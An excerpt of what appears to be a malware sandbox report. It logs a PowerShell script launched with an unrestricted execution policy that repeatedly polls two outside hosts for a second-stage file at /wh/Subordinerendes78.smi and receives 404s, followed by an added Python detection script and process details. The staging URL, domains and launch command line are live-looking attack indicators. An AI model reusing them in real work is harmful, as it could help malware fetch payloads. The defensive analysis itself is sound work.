2024-12-05 09:40:15 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49721 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:20 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:21 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:21 GMT
    server: LiteSpeed
2024-12-05 09:40:21 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:21 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49722 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:26 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:27 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:26 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:27 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49723 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:32 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:33 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:32 GMT
    server: LiteSpeed
2024-12-05 09:40:33 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:33 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49724 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:38 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:40:38 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:40:38 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:38 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49725 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:44 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:40:44 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:40:44 GMT
server: LiteSpeed
2024-12-05 09:40:44 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:44 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49726 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:50 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:40:50 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:40:50 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:50 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49727 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:55 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:40:56 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:40:56 GMT
server: LiteSpeed
2024-12-05 09:40:56 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:56 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49728 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:41:01 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:41:02 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:41:02 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:41:02 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49729 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:41:07 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:41:08 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:41:07 GMT
server: LiteSpeed
2024-12-05 09:41:08 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:41:08 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
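Sessions 12 to 18 above show one pattern worth turning into detection logic: a single PowerShell process (PID 8008) requests the same path, /wh/Subordinerendes78.smi, alternately from www.erp-royal-crown.info and www.almrwad.com every five or six seconds, sends only Host and Connection headers (no User-Agent), and receives a 404 from both servers every time. The following Python triage pass is an added example and is not part of the sandbox report or of the sample; the request records in it are copied from the session table above, while the thresholds (at least two hosts, at most 30 s between requests) are assumptions chosen for this page.

```python
"""Triage of the HTTP sessions listed above: flag a process that polls one path
on several hosts, sends no User-Agent and only ever receives 404s.
The records come from the session table on this page; the code is an added
analysis example, not the sample's own code."""
from datetime import datetime
from statistics import median

# (timestamp, PID, destination IP, raw request head, response status) per session.
REQUESTS = [
    ("2024-12-05 09:40:32", 8008, "148.251.114.233",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\nConnection: Keep-Alive\r\n\r\n", 404),
    ("2024-12-05 09:40:38", 8008, "184.171.244.231",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.almrwad.com\r\nConnection: Keep-Alive\r\n\r\n", 404),
    ("2024-12-05 09:40:44", 8008, "148.251.114.233",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\nConnection: Keep-Alive\r\n\r\n", 404),
    ("2024-12-05 09:40:50", 8008, "184.171.244.231",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.almrwad.com\r\nConnection: Keep-Alive\r\n\r\n", 404),
    ("2024-12-05 09:40:55", 8008, "148.251.114.233",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\nConnection: Keep-Alive\r\n\r\n", 404),
    ("2024-12-05 09:41:01", 8008, "184.171.244.231",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.almrwad.com\r\nConnection: Keep-Alive\r\n\r\n", 404),
    ("2024-12-05 09:41:07", 8008, "148.251.114.233",
     "GET /wh/Subordinerendes78.smi HTTP/1.1\r\nHost: www.erp-royal-crown.info\r\nConnection: Keep-Alive\r\n\r\n", 404),
]


def parse_request(raw):
    """Split an HTTP/1.1 request head into (method, path, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def triage(requests, min_hosts=2, max_gap_seconds=30):
    """Return {pid: [reasons]} for processes whose HTTP behaviour looks like a
    second-stage poller. Thresholds are assumptions chosen for this example."""
    by_pid = {}
    for ts, pid, dst_ip, raw, status in requests:
        _method, path, headers = parse_request(raw)
        rec = by_pid.setdefault(pid, {"hosts": set(), "paths": set(), "statuses": set(),
                                      "times": [], "no_user_agent": 0})
        rec["hosts"].add(headers.get("host", dst_ip))
        rec["paths"].add(path)
        rec["statuses"].add(status)
        rec["times"].append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))
        if "user-agent" not in headers:
            rec["no_user_agent"] += 1

    findings = {}
    for pid, rec in by_pid.items():
        times = sorted(rec["times"])
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        reasons = []
        if rec["no_user_agent"]:
            reasons.append(f"{rec['no_user_agent']} request(s) without a User-Agent header")
        if len(rec["paths"]) == 1 and len(rec["hosts"]) >= min_hosts:
            reasons.append(f"same path {next(iter(rec['paths']))} requested from {len(rec['hosts'])} hosts")
        if rec["statuses"] == {404} and len(times) > 1:
            reasons.append("every response was 404: the second stage was not served")
        if gaps and max(gaps) <= max_gap_seconds:
            reasons.append(f"regular polling, median gap {median(gaps):.0f}s")
        if reasons:
            findings[pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in triage(REQUESTS).items():
        print(f"PID {pid}:")
        for reason in reasons:
            print(f"  - {reason}")
```

The 404s do not make this traffic benign: the staging path was simply empty at analysis time, and the same hosts may serve the payload later, so the path, both hostnames and the User-Agent-less request shape remain usable indicators.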


                                                                            Target ID:0
                                                                            Start time:04:39:07
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:04:39:07
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:04:39:09
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
